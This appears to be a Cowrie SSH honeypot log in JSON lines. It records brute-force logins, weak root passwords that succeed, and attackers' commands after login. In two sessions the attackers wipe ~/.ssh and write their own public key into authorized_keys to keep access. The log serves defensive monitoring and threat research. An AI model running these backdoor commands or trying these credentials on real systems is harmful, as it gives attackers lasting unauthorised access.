{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:54:11.994609Z","src_ip":"212.227.235.229","session":"4bc98303f665"}
{"eventid":"cowrie.login.success","username":"root","password":"!@#qwe123","message":"login attempt [root/!@#qwe123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:54:12.660941Z","src_ip":"212.227.235.229","session":"4bc98303f665"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:54:13.042452Z","src_ip":"212.227.235.229","session":"4bc98303f665"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:54:13.043164Z","src_ip":"212.227.235.229","session":"4bc98303f665"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:54:13.044263Z","src_ip":"212.227.235.229","session":"4bc98303f665"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:54:13.203353Z","src_ip":"212.227.235.229","session":"4bc98303f665"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:54:13.534590Z","src_ip":"212.227.235.229","session":"4bc98303f665"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:54:13.535223Z","src_ip":"212.227.235.229","session":"4bc98303f665"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:54:13.694898Z","src_ip":"212.227.235.229","session":"4bc98303f665"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:54:13.695807Z","src_ip":"212.227.235.229","session":"4bc98303f665"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38906,"dst_ip":"1.2.3.4","dst_port":22,"session":"5936ff5a9242","protocol":"ssh","message":"New connection: 212.227.235.229:38906 (1.2.3.4:22) [session: 5936ff5a9242]","sensor":"my-vps","timestamp":"2025-09-08T12:54:13.863810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:54:13.874170Z","src_ip":"212.227.235.229","session":"5936ff5a9242"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:54:14.038542Z","src_ip":"212.227.235.229","session":"5936ff5a9242"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:54:14.701026Z","src_ip":"212.227.235.229","session":"5936ff5a9242"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:54:15.868319Z","src_ip":"212.227.235.229","session":"5936ff5a9242"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38908,"dst_ip":"1.2.3.4","dst_port":22,"session":"d860040239f2","protocol":"ssh","message":"New connection: 212.227.235.229:38908 (1.2.3.4:22) [session: d860040239f2]","sensor":"my-vps","timestamp":"2025-09-08T12:54:16.027655Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:54:16.028895Z","src_ip":"212.227.235.229","session":"d860040239f2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:54:16.187789Z","src_ip":"212.227.235.229","session":"d860040239f2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:54:16.866645Z","src_ip":"212.227.235.229","session":"d860040239f2"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:54:17.027126Z","src_ip":"212.227.235.229","session":"4bc98303f665"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:54:17.028053Z","src_ip":"212.227.235.229","session":"d860040239f2"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49670,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d9eff517a7b","protocol":"ssh","message":"New connection: 217.72.205.35:49670 (1.2.3.4:22) [session: 6d9eff517a7b]","sensor":"my-vps","timestamp":"2025-09-08T12:54:19.987228Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:54:19.988523Z","src_ip":"217.72.205.35","session":"6d9eff517a7b"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":34932,"dst_ip":"1.2.3.4","dst_port":22,"session":"20494451948f","protocol":"ssh","message":"New connection: 139.59.14.27:34932 (1.2.3.4:22) [session: 20494451948f]","sensor":"my-vps","timestamp":"2025-09-08T12:54:28.177707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:54:28.178533Z","src_ip":"139.59.14.27","session":"20494451948f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:54:28.486110Z","src_ip":"139.59.14.27","session":"20494451948f"}
{"eventid":"cowrie.login.success","username":"root","password":"123qwe...","message":"login attempt [root/123qwe...] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:54:29.766011Z","src_ip":"139.59.14.27","session":"20494451948f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:54:30.440205Z","src_ip":"139.59.14.27","session":"20494451948f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:54:30.440894Z","src_ip":"139.59.14.27","session":"20494451948f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T12:54:30.442273Z","src_ip":"139.59.14.27","session":"20494451948f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:54:30.761147Z","src_ip":"139.59.14.27","session":"20494451948f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:54:31.475094Z","src_ip":"139.59.14.27","session":"20494451948f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T12:54:31.475744Z","src_ip":"139.59.14.27","session":"20494451948f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:54:31.797453Z","src_ip":"139.59.14.27","session":"20494451948f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:54:31.798400Z","src_ip":"139.59.14.27","session":"20494451948f"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":54014,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4483334ef31","protocol":"ssh","message":"New connection: 139.59.14.27:54014 (1.2.3.4:22) [session: d4483334ef31]","sensor":"my-vps","timestamp":"2025-09-08T12:54:32.136090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:54:32.137076Z","src_ip":"139.59.14.27","session":"d4483334ef31"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:54:32.469212Z","src_ip":"139.59.14.27","session":"d4483334ef31"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:54:33.903583Z","src_ip":"139.59.14.27","session":"d4483334ef31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44474,"dst_ip":"1.2.3.4","dst_port":22,"session":"775096b5f63e","protocol":"ssh","message":"New connection: 212.227.235.229:44474 (1.2.3.4:22) [session: 775096b5f63e]","sensor":"my-vps","timestamp":"2025-09-08T12:54:34.286656Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:54:34.287363Z","src_ip":"212.227.235.229","session":"775096b5f63e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:54:34.587410Z","src_ip":"212.227.235.229","session":"775096b5f63e"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:54:35.268111Z","src_ip":"139.59.14.27","session":"d4483334ef31"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":54024,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c397ec4fda5","protocol":"ssh","message":"New connection: 139.59.14.27:54024 (1.2.3.4:22) [session: 5c397ec4fda5]","sensor":"my-vps","timestamp":"2025-09-08T12:54:35.607021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:54:35.608455Z","src_ip":"139.59.14.27","session":"5c397ec4fda5"}
{"eventid":"cowrie.login.failed","username":"operator","password":"Welcome1","message":"login attempt [operator/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T12:54:35.825075Z","src_ip":"212.227.235.229","session":"775096b5f63e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:54:35.941031Z","src_ip":"139.59.14.27","session":"5c397ec4fda5"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:54:37.126613Z","src_ip":"212.227.235.229","session":"775096b5f63e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:54:37.353699Z","src_ip":"139.59.14.27","session":"5c397ec4fda5"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:54:37.672743Z","src_ip":"139.59.14.27","session":"20494451948f"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:54:37.685265Z","src_ip":"139.59.14.27","session":"5c397ec4fda5"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":44630,"dst_ip":"1.2.3.4","dst_port":22,"session":"83b2f9eca70e","protocol":"ssh","message":"New connection: 134.199.174.250:44630 (1.2.3.4:22) [session: 83b2f9eca70e]","sensor":"my-vps","timestamp":"2025-09-08T12:54:39.527980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:54:39.528642Z","src_ip":"134.199.174.250","session":"83b2f9eca70e"}
